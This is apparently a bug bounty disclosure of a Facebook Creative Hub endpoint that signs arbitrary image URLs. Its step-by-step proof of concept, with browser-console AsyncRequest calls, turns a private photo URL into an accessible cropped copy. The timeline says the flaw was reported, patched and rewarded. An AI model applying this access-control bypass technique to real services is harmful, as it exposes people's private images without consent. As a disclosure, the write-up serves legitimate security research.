A business endpoint exists in Creative Hub that allows one to upload a project icon via the ad account library connected to the project. This endpoint creates valid signatures for URLS that were previously not valid. This is based directly on work done by Samm0uda.

1. Get a private photo and remove all additional query parameters

https://scontent.fpos3-1.fna.fbcdn.net/v/t1.0-9/87284588_124830725745195_9124219877853233152_n.png?_nc_cat=1&_nc_sid=85a577&_nc_ohc=qpVkR_UAuMcAX_4excB&_nc_ht=scontent.fpos3-1.fna&oh=8716dde6708dcb1b24625737818164d0&oe=5EC97A80

to

https://scontent.fpos3-1.fna.fbcdn.net/v/t1.0-9/87284588_124830725745195_9124219877853233152_n.png

2. Given an AdaccountA from BusinessA linked to the current user UserA execute the following in a browser console.

new AsyncRequest('https://business.facebook.com/ads/creativehub/project/edit/?ad_account_id=AdaccountA&name=WhiteHatText&profile_picture_url=https://scontent.fpos3-1.fna.fbcdn.net/v/t1.0-9/87284588_124830725745195_9124219877853233152_n.png').send()

3. Get the current projects

new AsyncRequest('https://business.facebook.com/ads/creative-studio/projects/?business_id=BusinessA').send()

4. One of the items in the response will have the new generated URL

5. The new URL will point to a 64×64 cropped version of the private photo

Timeline

Mar 13, 2020 – Report sent
Mar 13, 2020 – Confirmation of submission by Facebook
Mar 16, 2020 – Confirmation of patch by Facebook
Apr 16, 2020 – Bounty awarded by Facebook

Thanks again to Samm0uda and the rest of the Yes™ who have provided in depth knowledge and motivation.